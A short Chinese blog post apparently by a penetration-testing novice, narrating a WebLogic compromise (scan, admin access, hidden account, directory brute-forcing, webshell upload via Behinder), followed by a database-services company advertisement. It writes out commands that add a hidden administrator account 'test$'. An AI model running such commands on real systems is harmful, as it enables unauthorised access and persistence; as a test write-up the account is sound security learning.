各位新朋友~记得先点蓝字关注我哦~
初学渗透,跟着大佬参加一次测试~
0x00 探寻目标
首先Goby快速扫描,发现某机器在86端口有weblogic报错,先简单的工具一把梭:
Surprise,直接管理员权限!
0x01 目标利用
查看端口开放情况
3389开放!
直接添加账户,远程!
net user test$ 123456 addnet localgroup administrators test$ add
......
尝试各种payload直接上线CS
然而防火墙:Stop!
看下有没终端杀软,tasklist暂未识别出异常
试试找WEB路径传shell
python3 dirsearch.py -u url
......
试试再-r (递归遍历)-x(排除状态码)
python3 dirsearch.py -u url -r -x 500,401
有戏~
文件搜索一波
dir c:\index.html b s
结果较多,复制到文本上缩小下范围
略笨,一个个上传测试
终于!!!
冰蝎连接
Bingo!
未完待续......
美创是国内领先的数据库服务提供商。服务团队拥有PG ACED 1名、Oracle&PG ACE 3人、DSI智库专家5名、DSMM测评师7名、OCM 20余人、数十名Oracle OCP、MySQL OCP、TDSQL TCP、OceanBase OBCP、TiDB PTCP、达梦 DCP、人大金仓、红帽RHCA、中间件weblogic、tuxedo、CISP-DSG、CISSP、CDGA、CDPSE、CZTP、CDSP等认证人员,著有《DBA攻坚指南:左手Oracle,右手MySQL》,《Oracle数据库性能优化方法和最佳实践》,《Oracle内核技术揭秘》,《Oracle DBA实战攻略》等多本数据库书籍。运维各类数据库合计5000余套,精通Oracle、MySQL、SQLServer、DB2、PostgreSQL、MongoDB、Redis、TDSQL、OceanBase、达梦、人大金仓等主流商业和开源数据库。美创拥有完善的运维体系和人员培养体系,并同时提供超融合、私有云整体服务解决方案、数据安全咨询及运营服务方案等,已为金融、政府、企业、能源等多个行业的客户提供量身定制的各类服务,赢得了客户的高度赞誉和广泛认可。
